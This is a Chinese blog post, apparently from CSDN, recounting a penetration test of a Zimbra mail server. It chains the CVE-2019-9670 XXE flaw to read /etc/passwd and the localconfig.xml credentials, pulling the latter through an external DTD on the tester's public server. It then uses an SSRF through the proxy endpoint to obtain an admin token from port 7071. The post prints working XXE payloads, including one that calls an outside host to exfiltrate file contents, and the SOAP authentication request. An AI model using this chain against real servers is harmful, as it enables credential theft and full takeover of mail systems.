zimbra漏洞利用

记一次渗透测试zimbra漏洞利用

当时通过界面判断判断出开发利用zimbra搭建的网站。zimbra又存在多个漏洞。
1.首先通过利用了CVE-2019-9670 XXE漏洞来尝试读取/etc/passwd
在这里插入图片描述读取文件成功,证明此漏洞可以被成功利用。
2.接下来读取zimbra的配置文件获取密码,因为配置文件时xml文件,因此需要使用外部dtd获取信息。
请求接口:Post:/Autodiscover/Autodiscover.xml
Zimbra配置文件位置为/conf/localconfig.xml
在这里插入图片描述在公网IP上创建dtd文件,内容如上图所示并通过python搭建http服务。调用公网上的dtd读取配置文件,获取zimbra用户密码。
在这里插入图片描述
3.通刚刚获取的密码获取低权限的token

请求接口:Post: /service/soap
在这里插入图片描述
4.利用ssrf漏洞获通过proxy接口,访问admin的soap接口获取高权限Token

请求接口:Post:
/service/proxy?target=https://127.0.0.1:7071/service/admin/soap
PS:注意事项

Host:后面加端口7071
Cookie中设置Key为ZM_ADMIN_AUTH_TOKEN,值为上面请求所获取的token。
发送同上Body内容,但是AuthRequest的xmlns要改为:urn:zimbraAdmin,否则获取的还是普通权限的Token
在这里插入图片描述
获取高权限以后,下一步正常情况应该是上传文件getshell,但是这个测试环境目标文件夹被写死了,我的root权限也没办法写入文件,后续通过第一步的xxe任意文件浏览进行的信息收集,发现在他的上传文件存默认目录下直接存在webshell,直接拿到的权限。

XXE代码:
1.

<!DOCTYPE xxe [
<!ELEMENT name ANY
>
<!ENTITY xxe SYSTEM
"file:///etc/passwd" >]>
 <Autodiscover
xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&xxe;</AcceptableResponseSchema>
    </Request>
</Autodiscover>
<!DOCTYPE Autodiscover [
<!ENTITY % dtd SYSTEM "http://公网服务器/dtd">
%dtd;
%all;
]>
<Autodiscover
xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
<Request>
<EMailAddress>aaaaa</EMailAddress>
<AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
</Request>
</Autodiscover>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>上一步得到密码</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>`

4.和3一样上面有说明。

此文章存在问题请联系作者删除相关问题。
参考链接:写的很清楚
https://blog.csdn.net/weixin_40709439/article/details/90136596
https://www.bbsmax.com/A/kvJ31mgAdg/

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值